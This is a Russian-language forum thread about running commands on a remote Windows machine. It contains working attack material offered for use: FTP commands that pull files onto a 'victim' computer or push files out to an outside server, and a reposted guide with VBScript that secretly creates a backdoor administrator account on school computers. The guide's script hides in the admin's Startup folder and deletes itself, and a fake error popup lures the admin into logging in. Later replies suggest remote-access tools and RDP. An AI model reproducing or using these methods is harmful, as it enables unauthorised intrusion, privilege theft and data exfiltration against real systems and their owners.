Вобщем есть возможность выполнения cmd на удалённой машине, под виндой.. распишите пожалуйста как допустим закачать и запустить exe файл?

открыть папку на запись. записать через сеть. запустить

upd
посмотри команды
net share
cacls

а по подробнее можно, с технической стороны?)

ещё вариант:
Поднять у себя ftp-сервер. Запустить на компе-жертве клиента ftp. Законнектится к серверу (open server_name:port) и сделать get file_name.

а по подробнее можно, с технической стороны?)
расписать по действиям - неинтересно) лучше сам покопайся - полезнее будет!

ещё вариант:
Поднять у себя ftp-сервер. Запустить на компе-жертве клиента ftp. Законнектится к серверу (open server_name:port) и сделать get file_name.
Не всегда работает кстати (то есть фтп просто не открывается иногда(у меня лично так было))

фтп должен быть не через пассивный режим.


ftp -s:123.ftp

в 123.ftp пишем:
OPEN ftpserv.ru
user
pass
put C:\porno.zip
bye

Прива вам школьники и студенты! Я хочу дать вам несколько полезных советов к началу учебного года. Я более чем уверен, что вас уже достала ваша учетная запись с ограниченными правами на виндах 2k NT или XP и вам хочется больше, намного больше! В вашем учебном заведении наверняка есть злые дядьки, которых называют админами, и только эти негодяи знают пассы на элитные учетные записи. Просто падонки, не правда ли? Мы это исправим, более того, мы их свергнем, а вы будете новым королём с большими привилегиями.

Итак, что нам для этого нужно? Лишь 5-10 минут провести за нужным нам компом, что бы на нём был хотя бы один текстовый редактор и целый запас желания получить админскую учетку. Весь этот способ основан на WSH, лучшего пожалуй средсвта для компьютерного западла в виндах (смотри ][ 36 выпуск!). Ни для кого не секрет, что админы логятся на тачках со своей учетной записью (да часто с таким гордым видом)... От этого и будем плясать. Сначала нам потребуется написать простой скриптик "Действия I (урвать хоть что-нибудь)".

Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user xakep 1111 /add", True)
\\\ тут мы добавляем юзера xakep c паролем 1111
Call helo("C:\windows\system32\net.exe localgroup Администраторы xakep /add", True)
\\\ тут наш юзер становится настоящим админом !!!

и назовем наше творение admin.vbs.

Да всё это просто замечательно, только прав у нас маловато. А вот прав админчика нам как раз хватит, поскольку ключ реестра HKEY_LOCAL_MACHINE нам не доступен у нас не получится заставить грузится этот скрипт у всех юзеров. А зачем нам лишние заморочки, мы будем делать проще, мы просто откроем путь c:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузк а\ и нежно и аккуратно положим туда наш скрипт. Тут возникает другой вопрос - а вдруг админ его заметит... Не заметит, в конце скрипта добавляем следующее:

Set Killer=CreateObject("Scripting.FileSystemObject")
Killer.DeleteFile(" C:\Documents and Settings\Администратор\ Главное меню\Программы\Автозагрузк а\ admin.vbs")

(главное помнить, что админ может использовать не встроенную учетную запись "Администратор", а что-нибудь поудобнее, но я вас уверяю, с правами он себя никогда не обделит). И после того, как админ войдёт в систему под своим аккаунтом все дело будет сделано, а как заставить его это сделать я расскажу в конце. Итак, собственный админский аккаунт у нас уже есть, но что мешает настоящему админу его удалить... Это тоже поправимо, делаем следующее.

Заходим в командную строку и набиваем "net localgroup Администраторы" - смотрим кто же у нас имеет права админить, записываем или запоминаем... Действие II ( прощай админ, не поминай лихом). Пишем примерно такой же скрипт ;

Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user Администратор 1111 /add", True)

Действие III (админ иди работай)

Теперь как же быть с толстыми и ленивыми админами, которым влом хотя бы раз в неделю проверить комп? Их придётся заставить тащить свою задницу к тачке и логинится адинской записью. Надо так надо... К примеру пусть выскакивает мессага о какой-нибудь злой ошибке (это я полностью украду из их журнала выпуска 36) - тоже небольшой скриптик, который мы поместим в реестре на этот раз:

Hacker = MsgBox("тут вы впишите чтонибудь заумное и страшное например "Explorer.exe не может получить доступ к памяти 0x77e626ba", 20, "System error")



(с) не моё

а одной строкой можно сделать?

залей радмина , а потом сделай с него дед)

Вобщем, если внешний айпи - создай юзера через net user. Потом через ту же cmd открой RDP. Подробнее - гугл.